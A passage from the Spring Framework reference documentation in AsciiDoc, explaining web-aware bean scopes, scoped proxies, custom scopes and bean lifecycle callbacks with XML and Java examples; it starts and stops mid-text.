the\n`org.springframework.web.context.request.RequestContextListener` `ServletRequestListener`.\nFor Servlet 3.0+, this can be done programmatically via the `WebApplicationInitializer`\ninterface. Alternatively, or for older containers, add the following declaration to\nyour web application's `web.xml` file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t...\n\t\t<listener>\n\t\t\t<listener-class>\n\t\t\t\torg.springframework.web.context.request.RequestContextListener\n\t\t\t<\/listener-class>\n\t\t<\/listener>\n\t\t...\n\t<\/web-app>\n----\n\nAlternatively, if there are issues with your listener setup, consider using Spring's\n`RequestContextFilter`. The filter mapping depends on the surrounding web\napplication configuration, so you have to change it as appropriate.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t...\n\t\t<filter>\n\t\t\t<filter-name>requestContextFilter<\/filter-name>\n\t\t\t<filter-class>org.springframework.web.filter.RequestContextFilter<\/filter-class>\n\t\t<\/filter>\n\t\t<filter-mapping>\n\t\t\t<filter-name>requestContextFilter<\/filter-name>\n\t\t\t<url-pattern>\/*<\/url-pattern>\n\t\t<\/filter-mapping>\n\t\t...\n\t<\/web-app>\n----\n\n`DispatcherServlet`, `RequestContextListener`, and `RequestContextFilter` all do exactly\nthe same thing, namely bind the HTTP request object to the `Thread` that is servicing\nthat request. This makes beans that are request- and session-scoped available further\ndown the call chain.\n\n\n[[beans-factory-scopes-request]]\n==== Request scope\n\nConsider the following XML configuration for a bean definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"loginAction\" class=\"com.foo.LoginAction\" scope=\"request\"\/>\n----\n\nThe Spring container creates a new instance of the `LoginAction` bean by using the\n`loginAction` bean definition for each and every HTTP request. That is, the\n`loginAction` bean is scoped at the HTTP request level. You can change the internal\nstate of the instance that is created as much as you want, because other instances\ncreated from the same `loginAction` bean definition will not see these changes in state;\nthey are particular to an individual request. When the request completes processing, the\nbean that is scoped to the request is discarded.\n\nWhen using annotation-driven components or Java Config, the `@RequestScope` annotation\ncan be used to assign a component to the `request` scope.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@RequestScope**\n\t@Component\n\tpublic class LoginAction {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[beans-factory-scopes-session]]\n==== Session scope\n\nConsider the following XML configuration for a bean definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\"\/>\n----\n\nThe Spring container creates a new instance of the `UserPreferences` bean by using the\n`userPreferences` bean definition for the lifetime of a single HTTP `Session`. In other\nwords, the `userPreferences` bean is effectively scoped at the HTTP `Session` level. As\nwith `request-scoped` beans, you can change the internal state of the instance that is\ncreated as much as you want, knowing that other HTTP `Session` instances that are also\nusing instances created from the same `userPreferences` bean definition do not see these\nchanges in state, because they are particular to an individual HTTP `Session`. When the\nHTTP `Session` is eventually discarded, the bean that is scoped to that particular HTTP\n`Session` is also discarded.\n\nWhen using annotation-driven components or Java Config, the `@SessionScope` annotation\ncan be used to assign a component to the `session` scope.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SessionScope**\n\t@Component\n\tpublic class UserPreferences {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[beans-factory-scopes-application]]\n==== Application scope\n\nConsider the following XML configuration for a bean definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"appPreferences\" class=\"com.foo.AppPreferences\" scope=\"application\"\/>\n----\n\nThe Spring container creates a new instance of the `AppPreferences` bean by using the\n`appPreferences` bean definition once for the entire web application. That is, the\n`appPreferences` bean is scoped at the `ServletContext` level, stored as a regular\n`ServletContext` attribute. This is somewhat similar to a Spring singleton bean but\ndiffers in two important ways: It is a singleton per `ServletContext`, not per Spring\n'ApplicationContext' (for which there may be several in any given web application),\nand it is actually exposed and therefore visible as a `ServletContext` attribute.\n\nWhen using annotation-driven components or Java Config, the `@ApplicationScope`\nannotation can be used to assign a component to the `application` scope.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ApplicationScope**\n\t@Component\n\tpublic class AppPreferences {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[beans-factory-scopes-other-injection]]\n==== Scoped beans as dependencies\n\nThe Spring IoC container manages not only the instantiation of your objects (beans),\nbut also the wiring up of collaborators (or dependencies). If you want to inject (for\nexample) an HTTP request scoped bean into another bean of a longer-lived scope, you may\nchoose to inject an AOP proxy in place of the scoped bean. That is, you need to inject\na proxy object that exposes the same public interface as the scoped object but that can\nalso retrieve the real target object from the relevant scope (such as an HTTP request)\nand delegate method calls onto the real object.\n\n[NOTE]\n====\nYou may also use `<aop:scoped-proxy\/>` between beans that are scoped as `singleton`,\nwith the reference then going through an intermediate proxy that is serializable\nand therefore able to re-obtain the target singleton bean on deserialization.\n\nWhen declaring `<aop:scoped-proxy\/>` against a bean of scope `prototype`, every method\ncall on the shared proxy will lead to the creation of a new target instance which the\ncall is then being forwarded to.\n\nAlso, scoped proxies are not the only way to access beans from shorter scopes in a\nlifecycle-safe fashion. You may also simply declare your injection point (i.e. the\nconstructor\/setter argument or autowired field) as `ObjectFactory<MyTargetBean>`,\nallowing for a `getObject()` call to retrieve the current instance on demand every\ntime it is needed - without holding on to the instance or storing it separately.\n\nAs an extended variant, you may declare `ObjectProvider<MyTargetBean>` which delivers\nseveral additional access variants, including `getIfAvailable` and `getIfUnique`.\n\nThe JSR-330 variant of this is called `Provider`, used with a `Provider<MyTargetBean>`\ndeclaration and a corresponding `get()` call for every retrieval attempt.\nSee <<beans-standard-annotations,here>> for more details on JSR-330 overall.\n====\n\nThe configuration in the following example is only one line, but it is important to\nunderstand the \"why\" as well as the \"how\" behind it.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:aop=\"http:\/\/www.springframework.org\/schema\/aop\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\/spring-aop.xsd\">\n\n\t\t<!-- an HTTP Session-scoped bean exposed as a proxy -->\n\t\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\">\n\t\t\t<!-- instructs the container to proxy the surrounding bean -->\n\t\t\t<aop:scoped-proxy\/>\n\t\t<\/bean>\n\n\t\t<!-- a singleton-scoped bean injected with a proxy to the above bean -->\n\t\t<bean id=\"userService\" class=\"com.foo.SimpleUserService\">\n\t\t\t<!-- a reference to the proxied userPreferences bean -->\n\t\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nTo create such a proxy, you insert a child `<aop:scoped-proxy\/>` element into a scoped\nbean definition (see <<beans-factory-scopes-other-injection-proxies>> and\n<<xsd-configuration>>). Why do definitions of beans scoped at the `request`, `session`\nand custom-scope levels require the `<aop:scoped-proxy\/>` element? Let's examine the\nfollowing singleton bean definition and contrast it with what you need to define for\nthe aforementioned scopes (note that the following `userPreferences` bean definition\nas it stands is __incomplete__).\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\"\/>\n\n\t<bean id=\"userManager\" class=\"com.foo.UserManager\">\n\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t<\/bean>\n----\n\nIn the preceding example, the singleton bean `userManager` is injected with a reference\nto the HTTP `Session`-scoped bean `userPreferences`. The salient point here is that the\n`userManager` bean is a singleton: it will be instantiated __exactly once__ per\ncontainer, and its dependencies (in this case only one, the `userPreferences` bean) are\nalso injected only once. This means that the `userManager` bean will only operate on the\nexact same `userPreferences` object, that is, the one that it was originally injected\nwith.\n\nThis is __not__ the behavior you want when injecting a shorter-lived scoped bean into a\nlonger-lived scoped bean, for example injecting an HTTP `Session`-scoped collaborating\nbean as a dependency into singleton bean. Rather, you need a single `userManager`\nobject, and for the lifetime of an HTTP `Session`, you need a `userPreferences` object\nthat is specific to said HTTP `Session`. Thus the container creates an object that\nexposes the exact same public interface as the `UserPreferences` class (ideally an\nobject that __is a__ `UserPreferences` instance) which can fetch the real\n`UserPreferences` object from the scoping mechanism (HTTP request, `Session`, etc.). The\ncontainer injects this proxy object into the `userManager` bean, which is unaware that\nthis `UserPreferences` reference is a proxy. In this example, when a `UserManager`\ninstance invokes a method on the dependency-injected `UserPreferences` object, it\nactually is invoking a method on the proxy. The proxy then fetches the real\n`UserPreferences` object from (in this case) the HTTP `Session`, and delegates the\nmethod invocation onto the retrieved real `UserPreferences` object.\n\nThus you need the following, correct and complete, configuration when injecting\n`request-` and `session-scoped` beans into collaborating objects:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\">\n\t\t<aop:scoped-proxy\/>\n\t<\/bean>\n\n\t<bean id=\"userManager\" class=\"com.foo.UserManager\">\n\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t<\/bean>\n----\n\n[[beans-factory-scopes-other-injection-proxies]]\n===== Choosing the type of proxy to create\n\nBy default, when the Spring container creates a proxy for a bean that is marked up with\nthe `<aop:scoped-proxy\/>` element, __a CGLIB-based class proxy is created__.\n\n[NOTE]\n====\nCGLIB proxies only intercept public method calls! Do not call non-public methods\non such a proxy; they will not be delegated to the actual scoped target object.\n====\n\nAlternatively, you can configure the Spring container to create standard JDK\ninterface-based proxies for such scoped beans, by specifying `false` for the value of\nthe `proxy-target-class` attribute of the `<aop:scoped-proxy\/>` element. Using JDK\ninterface-based proxies means that you do not need additional libraries in your\napplication classpath to effect such proxying. However, it also means that the class of\nthe scoped bean must implement at least one interface, and __that all__ collaborators\ninto which the scoped bean is injected must reference the bean through one of its\ninterfaces.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- DefaultUserPreferences implements the UserPreferences interface -->\n\t<bean id=\"userPreferences\" class=\"com.foo.DefaultUserPreferences\" scope=\"session\">\n\t\t<aop:scoped-proxy proxy-target-class=\"false\"\/>\n\t<\/bean>\n\n\t<bean id=\"userManager\" class=\"com.foo.UserManager\">\n\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t<\/bean>\n----\n\nFor more detailed information about choosing class-based or interface-based proxying,\nsee <<aop-proxying>>.\n\n\n\n[[beans-factory-scopes-custom]]\n=== Custom scopes\n\nThe bean scoping mechanism is extensible; You can define your own\nscopes, or even redefine existing scopes, although the latter is considered bad practice\nand you __cannot__ override the built-in `singleton` and `prototype` scopes.\n\n\n[[beans-factory-scopes-custom-creating]]\n==== Creating a custom scope\n\nTo integrate your custom scope(s) into the Spring container, you need to implement the\n`org.springframework.beans.factory.config.Scope` interface, which is described in this\nsection. For an idea of how to implement your own scopes, see the `Scope`\nimplementations that are supplied with the Spring Framework itself and the\n{api-spring-framework}\/beans\/factory\/config\/Scope.html[`Scope` javadocs],\nwhich explains the methods you need to implement in more detail.\n\nThe `Scope` interface has four methods to get objects from the scope, remove them from\nthe scope, and allow them to be destroyed.\n\nThe following method returns the object from the underlying scope. The session scope\nimplementation, for example, returns the session-scoped bean (and if it does not exist,\nthe method returns a new instance of the bean, after having bound it to the session for\nfuture reference).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tObject get(String name, ObjectFactory objectFactory)\n----\n\nThe following method removes the object from the underlying scope. The session scope\nimplementation for example, removes the session-scoped bean from the underlying session.\nThe object should be returned, but you can return null if the object with the specified\nname is not found.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tObject remove(String name)\n----\n\nThe following method registers the callbacks the scope should execute when it is\ndestroyed or when the specified object in the scope is destroyed. Refer to the javadocs\nor a Spring scope implementation for more information on destruction callbacks.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid registerDestructionCallback(String name, Runnable destructionCallback)\n----\n\nThe following method obtains the conversation identifier for the underlying scope. This\nidentifier is different for each scope. For a session scoped implementation, this\nidentifier can be the session identifier.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tString getConversationId()\n----\n\n\n[[beans-factory-scopes-custom-using]]\n==== Using a custom scope\n\nAfter you write and test one or more custom `Scope` implementations, you need to make\nthe Spring container aware of your new scope(s). The following method is the central\nmethod to register a new `Scope` with the Spring container:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid registerScope(String scopeName, Scope scope);\n----\n\nThis method is declared on the `ConfigurableBeanFactory` interface, which is available\non most of the concrete `ApplicationContext` implementations that ship with Spring via\nthe BeanFactory property.\n\nThe first argument to the `registerScope(..)` method is the unique name associated with\na scope; examples of such names in the Spring container itself are `singleton` and\n`prototype`. The second argument to the `registerScope(..)` method is an actual instance\nof the custom `Scope` implementation that you wish to register and use.\n\nSuppose that you write your custom `Scope` implementation, and then register it as below.\n\n[NOTE]\n====\nThe example below uses `SimpleThreadScope` which is included with Spring, but not\nregistered by default. The instructions would be the same for your own custom `Scope`\nimplementations.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tScope threadScope = new SimpleThreadScope();\n\tbeanFactory.registerScope(\"thread\", threadScope);\n----\n\nYou then create bean definitions that adhere to the scoping rules of your custom `Scope`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"...\" class=\"...\" scope=\"thread\">\n----\n\nWith a custom `Scope` implementation, you are not limited to programmatic registration\nof the scope. You can also do the `Scope` registration declaratively, using the\n`CustomScopeConfigurer` class:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:aop=\"http:\/\/www.springframework.org\/schema\/aop\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\/spring-aop.xsd\">\n\n\t\t<bean class=\"org.springframework.beans.factory.config.CustomScopeConfigurer\">\n\t\t\t<property name=\"scopes\">\n\t\t\t\t<map>\n\t\t\t\t\t<entry key=\"thread\">\n\t\t\t\t\t\t<bean class=\"org.springframework.context.support.SimpleThreadScope\"\/>\n\t\t\t\t\t<\/entry>\n\t\t\t\t<\/map>\n\t\t\t<\/property>\n\t\t<\/bean>\n\n\t\t<bean id=\"bar\" class=\"x.y.Bar\" scope=\"thread\">\n\t\t\t<property name=\"name\" value=\"Rick\"\/>\n\t\t\t<aop:scoped-proxy\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<property name=\"bar\" ref=\"bar\"\/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nWhen you place `<aop:scoped-proxy\/>` in a `FactoryBean` implementation, it is the factory\nbean itself that is scoped, not the object returned from `getObject()`.\n====\n\n\n\n\n[[beans-factory-nature]]\n== Customizing the nature of a bean\n\n\n\n[[beans-factory-lifecycle]]\n=== Lifecycle callbacks\n\nTo interact with the container's management of the bean lifecycle, you can implement the\nSpring `InitializingBean` and `DisposableBean` interfaces. The container calls\n`afterPropertiesSet()` for the former and `destroy()` for the latter to allow the bean\nto perform certain actions upon initialization and destruction of your beans.\n\n[TIP]\n====\nThe JSR-250 `@PostConstruct` and `@PreDestroy` annotations are generally considered best\npractice for receiving lifecycle callbacks in a modern Spring application. Using these\nannotations means that your beans are not coupled to Spring specific interfaces. For\ndetails see <<beans-postconstruct-and-predestroy-annotations>>.\n\nIf you don't want to use the JSR-250 annotations but you are still looking to remove\ncoupling consider the use of init-method and destroy-method object definition metadata.\n====\n\nInternally, the Spring Framework uses `BeanPostProcessor` implementations to process any\ncallback interfaces it can find and call the appropriate methods. If you need custom\nfeatures or other lifecycle behavior Spring does not offer out-of-the-box, you can\nimplement a `BeanPostProcessor` yourself. For more information, see\n<<beans-factory-extension>>.\n\nIn addition to the initialization and destruction callbacks, Spring-managed objects may\nalso implement the `Lifecycle` interface so that those objects can participate in the\nstartup and shutdown process as driven by the container's own lifecycle.\n\nThe lifecycle callback interfaces are described in this section.\n\n\n[[beans-factory-lifecycle-initializingbean]]\n==== Initialization callbacks\n\nThe `org.springframework.beans.factory.InitializingBean` interface allows a bean to\nperform initialization work after all necessary properties on the bean have been set by\nthe container. The `InitializingBean` interface specifies a single method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid afterPropertiesSet() throws Exception;\n----\n\nIt is recommended that you do not use the `InitializingBean` interface because it\nunnecessarily couples the code to Spring. Alternatively, use\nthe <<beans-postconstruct-and-predestroy-annotations, `@PostConstruct`>> annotation or\nspecify a POJO initialization method. In the case of XML-based configuration metadata,\nyou use the `init-method` attribute to specify the name of the method that has a void\nno-argument signature. With Java config, you use the `initMethod` attribute of `@Bean`,\nsee <<beans-java-lifecycle-callbacks>>. For example, the following:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.ExampleBean\" init-method=\"init\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tpublic void init() {\n\t\t\t\/\/ do some initialization work\n\t\t}\n\n\t}\n----\n\n...is exactly the same as...\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.AnotherExampleBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class AnotherExampleBean implements InitializingBean {\n\n\t\tpublic void afterPropertiesSet() {\n\t\t\t\/\/ do some initialization work\n\t\t}\n\n\t}\n----\n\nbut does not couple the code to Spring.\n\n\n[[beans-factory-lifecycle-disposablebean]]\n==== Destruction callbacks\n\nImplementing the `org.springframework.beans.factory.DisposableBean` interface allows a\nbean to get a callback when the container containing it is destroyed. The\n`DisposableBean` interface specifies a single method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid destroy() throws Exception;\n----\n\nIt is recommended that you do not use the `DisposableBean` callback interface because it\nunnecessarily couples the code to Spring. Alternatively, use\nthe <<beans-postconstruct-and-predestroy-annotations, `@PreDestroy`>> annotation or\nspecify a generic method that is supported by bean definitions. With XML-based\nconfiguration metadata, you use the `destroy-method` attribute on the `<bean\/>`.\nWith Java config, you use the `destroyMethod` attribute of `@Bean`, see\n<<beans-java-lifecycle-callbacks>>. For example, the following definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.ExampleBean\" destroy-method=\"cleanup\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tpublic void cleanup() {\n\t\t\t\/\/ do some destruction work (like releasing pooled connections)\n\t\t}\n\n\t}\n----\n\nis exactly the same as:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.AnotherExampleBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class AnotherExampleBean implements DisposableBean {\n\n\t\tpublic void destroy() {\n\t\t\t\/\/ do some destruction work (like releasing pooled connections)\n\t\t}\n\n\t}\n----\n\nbut does not couple the code to Spring.\n\n[TIP]\n====\nThe `destroy-method` attribute of a `<bean>` element can be assigned a special\n`(inferred)` value which instructs Spring to automatically detect a public `close` or\n`shutdown` method on the specific bean class (any class that implements\n`java.lang.AutoCloseable` or `java.io.Closeable` would therefore match). This special\n`(inferred)` value can also be set on the `default-destroy-method` attribute of a\n`<beans>` element to apply this behavior to an entire set of beans (see\n<<beans-factory-lifecycle-default-init-destroy-methods>>). Note that this is the\ndefault behavior with Java config.\n====\n\n[[beans-factory-lifecycle-default-init-destroy-methods]]\n==== Default initialization and destroy methods\n\nWhen you write initialization and destroy method callbacks that do not use the\nSpring-specific `InitializingBean` and `DisposableBean` callback interfaces, you\ntypically write methods with names such as `init()`, `initialize()`, `dispose()`, and so\non. Ideally, the names of such lifecycle callback methods are standardized across a\nproject so that all developers use the same method names and ensure consistency.\n\nYou can configure the Spring container to `look` for named initialization and destroy\ncallback method names on __every__ bean. This means that you, as an application\ndeveloper, can write your application classes and use an initialization callback called\n`init()`, without having to configure an `init-method=\"init\"` attribute with each bean\ndefinition. The Spring IoC container calls that method when the bean is created (and in\naccordance with the standard lifecycle callback contract described previously). This\nfeature also enforces a consistent naming convention for initialization and destroy\nmethod callbacks.\n\nSuppose that your initialization callback methods are named `init()` and destroy\ncallback methods are named `destroy()`. Your class will resemble the class in the\nfollowing example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class DefaultBlogService implements BlogService {\n\n\t\tprivate BlogDao blogDao;\n\n\t\tpublic void setBlogDao(BlogDao blogDao) {\n\t\t\tthis.blogDao = blogDao;\n\t\t}\n\n\t\t\/\/ this is (unsurprisingly) the initialization callback method\n\t\tpublic void init() {\n\t\t\tif (this.blogDao == null) {\n\t\t\t\tthrow new IllegalStateException(\"The [blogDao] property must be set.\");\n\t\t\t}\n\t\t}\n\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans default-init-method=\"init\">\n\n\t\t<bean id=\"blogService\" class=\"com.foo.DefaultBlogService\">\n\t\t\t<property name=\"blogDao\" ref=\"blogDao\" \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nThe presence of the `default-init-method` attribute on the top-level `<beans\/>` element\nattribute causes the Spring IoC container to recognize a method called `init` on beans\nas the initialization method callback. When a bean is created and assembled, if the bean\nclass has such a method, it is invoked at the appropriate time.\n\nYou configure destroy method callbacks similarly (in XML, that is) by using the\n`default-destroy-method` attribute on the top-level `<beans\/>` element.\n\nWhere existing bean classes already have callback methods that are named at variance\nwith the convention, you can override the default by specifying (in XML, that is) the\nmethod name using the `init-method` and `destroy-method` attributes of the `<bean\/>`\nitself.\n\nThe Spring container guarantees that a configured initialization callback is called\nimmediately after a bean is supplied with all dependencies. Thus the initialization\ncallback is called on the raw bean reference, which means that AOP interceptors and so\nforth are not yet applied to the bean. A target bean is fully created __first__,\n__then__ an AOP proxy (for example) with its interceptor chain is applied. If the target\nbean and the proxy are defined separately, your code can even interact with the raw\ntarget bean, bypassing the proxy. Hence, it would be inconsistent to apply the\ninterceptors to the init method, because doing so would couple the lifecycle of the\ntarget bean with its proxy\/interceptors and leave strange semantics when your code\ninteracts directly to the raw target bean.\n\n\n[[beans-factory-lifecycle-combined-effects]]\n==== Combining lifecycle mechanisms\n\nAs of Spring 2.5, you have three options for controlling bean lifecycle behavior: the\n<<beans-factory-lifecycle-initializingbean, `InitializingBean`>> and\n<<beans-factory-lifecycle-disposablebean, `DisposableBean`>> callback interfaces; custom\n`init()` and `destroy()` methods; and the\n<<beans-postconstruct-and-predestroy-annotations, `@PostConstruct` and `@PreDestroy`\nannotations>>. You can combine these mechanisms to control a given bean.\n\n[NOTE]\n====\nIf multiple lifecycle mechanisms are configured for a bean, and each mechanism is\nconfigured with a different method name, then each configured method is executed in the\norder listed below. However, if the same method name is configured - for example,\n`init()` for an initialization method - for more than one of these lifecycle mechanisms,\nthat method is executed once, as explained in the preceding section.\n====\n\nMultiple lifecycle mechanisms configured for the same bean, with different\ninitialization methods, are called as follows:\n\n* Methods annotated with `@PostConstruct`\n* `afterPropertiesSet()` as defined by the `InitializingBean` callback interface\n* A custom configured `init()` method\n\nDestroy methods are called in the same order:\n\n* Methods annotated with `@PreDestroy`\n* `destroy()` as defined by the `DisposableBean` callback interface\n* A custom configured `destroy()` method\n\n\n[[beans-factory-lifecycle-processor]]\n==== Startup and shutdown callbacks\n\nThe `Lifecycle` interface defines the essential methods for any object that has its own\nlifecycle requirements (e.g. starts and stops some background process):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface Lifecycle {\n\n\t\tvoid start();\n\n\t\tvoid stop();\n\n\t\tboolean isRunning();\n\n\t}\n----\n\nAny Spring-managed object may implement that interface. Then, when the\n`ApplicationContext` itself receives start and stop signals, e.g. for a stop\/restart\nscenario at runtime, it will cascade those calls to all `Lifecycle` implementations\ndefined within that context. It does this by delegating to a `LifecycleProcessor`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface LifecycleProcessor extends Lifecycle {\n\n\t\tvoid onRefresh();\n\n\t\tvoid onClose();\n\n\t}\n----\n\nNotice that the `LifecycleProcessor` is itself an extension of the `Lifecycle`\ninterface. It also adds two other methods for reacting to the context being refreshed\nand closed.\n\n[TIP]\n====\nNote that the regular `org.springframework.context.Lifecycle` interface is just a plain\ncontract for explicit start\/stop notifications and does NOT imply auto-startup at context\nrefresh time. Consider implementing `org.springframework.context.SmartLifecycle` instead\nfor fine-grained control over auto-startup of a specific bean (including startup phases).\nAlso, please note that stop notifications are not guaranteed to come before destruction:\nOn regular shutdown, all `Lifecycle` beans will first receive a stop notification before\nthe general destruction callbacks are being propagated; however, on hot refresh during a\ncontext's lifetime or on aborted refresh attempts, only destroy methods will be called.\n====\n\nThe order of startup and shutdown invocations can be important. If a \"depends-on\"\nrelationship exists between any two objects, the dependent side will start __after__ its\ndependency, and it will stop __before__ its dependency. However, at times the direct\ndependencies are unknown. You may only know that objects of a certain type should start\nprior to objects of another type. In those cases, the `SmartLifecycle` interface defines\nanother option, namely the `getPhase()` method as defined on its super-interface,\n`Phased`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface Phased {\n\n\t\tint getPhase();\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface SmartLifecycle extends Lifecycle, Phased {\n\n\t\tboolean isAutoStartup();\n\n\t\tvoid stop(Runnable callback);\n\n\t}\n----\n\nWhen starting, the objects with the lowest phase start first, and when stopping, the\nreverse order is followed. Therefore, an object that implements `SmartLifecycle` and\nwhose `getPhase()` method returns `Integer.MIN_VALUE` would be among the first to start\nand the last to stop. At the other end of the spectrum, a phase value of\n`Integer.MAX_VALUE` would indicate that the object should be started last and stopped\nfirst (likely because it depends on other processes to be running). When considering the\nphase value, it's also important to know that the default phase for any \"normal\"\n`Lifecycle` object that does not implement `SmartLifecycle` would be 0. Therefore, any\nnegative phase value would indicate that an object should start before those standard\ncomponents (and stop after them), and vice versa for any positive phase value.\n\nAs you can see the stop method defined by `SmartLifecycle` accepts a callback. Any\nimplementation __must__ invoke that callback's `run()` method after that implementation's\nshutdown process is complete. That enables asynchronous shutdown where necessary since\nthe default implementation of the `LifecycleProcessor` interface,\n`DefaultLifecycleProcessor`, will wait up to its timeout value for the group of objects\nwithin each phase to invoke that callback. The default per-phase timeout is 30 seconds.\nYou can override the default lifecycle processor instance by defining a bean named\n\"lifecycleProcessor\" within the context. If you only want to modify the timeout, then\ndefining the following would be sufficient:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"lifecycleProcessor\" class=\"org.springframework.context.support.DefaultLifecycleProcessor\">\n\t\t<!-- timeout value in milliseconds -->\n\t\t<property name=\"timeoutPerShutdownPhase\" value=\"10000\"\/>\n\t<\/bean>\n----\n\nAs mentioned, the `LifecycleProcessor` interface defines callback methods for the\nrefreshing and closing of the context as well. The latter will simply drive the shutdown\nprocess as if `stop()` had been called explicitly, but it will happen when the context is\nclosing. The 'refresh' callback on the other hand enables another feature of\n`SmartLifecycle` beans. When the context is refreshed (after all objects have been\ninstantiated and initialized), that callback will be invoked, and at that point the\ndefault lifecycle processor will check the boolean value returned by each\n`SmartLifecycle` object's `isAutoStartup()` method. If \"true\", then that object will be\nstarted at that point rather than waiting for an explicit invocation of the context's or\nits own `start()` method (unlike the context refresh, the context start does not happen\nautomatically for a standard context implementation). The \"phase\" value as well as any\n\"depends-on\" relationships will determine the startup order in the same way as described\nabove.\n\n\n[[beans-factory-shutdown]]\n==== Shutting down the Spring IoC container gracefully in non-web applications\n\n[NOTE]\n====\nThis section applies only to non-web applications. Spring's web-based\n`ApplicationContext` implementations already have code in place to shut down the Spring\nIoC container gracefully when the relevant web application is shut down.\n====\n\nIf you are using Spring's IoC container in a non-web application environment; for\nexample, in a rich client desktop environment; you register a shutdown hook with the\nJVM. Doing so ensures a graceful shutdown and calls the relevant destroy methods on your\nsingleton beans so that all resources are released. Of course, you must still configure\nand implement these destroy callbacks correctly.\n\nTo register a shutdown hook, you call the `registerShutdownHook()` method that is\ndeclared on the `ConfigurableApplicationContext` interface:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.context.ConfigurableApplicationContext;\n\timport org.springframework.context.support.ClassPathXmlApplicationContext;\n\n\tpublic final class Boot 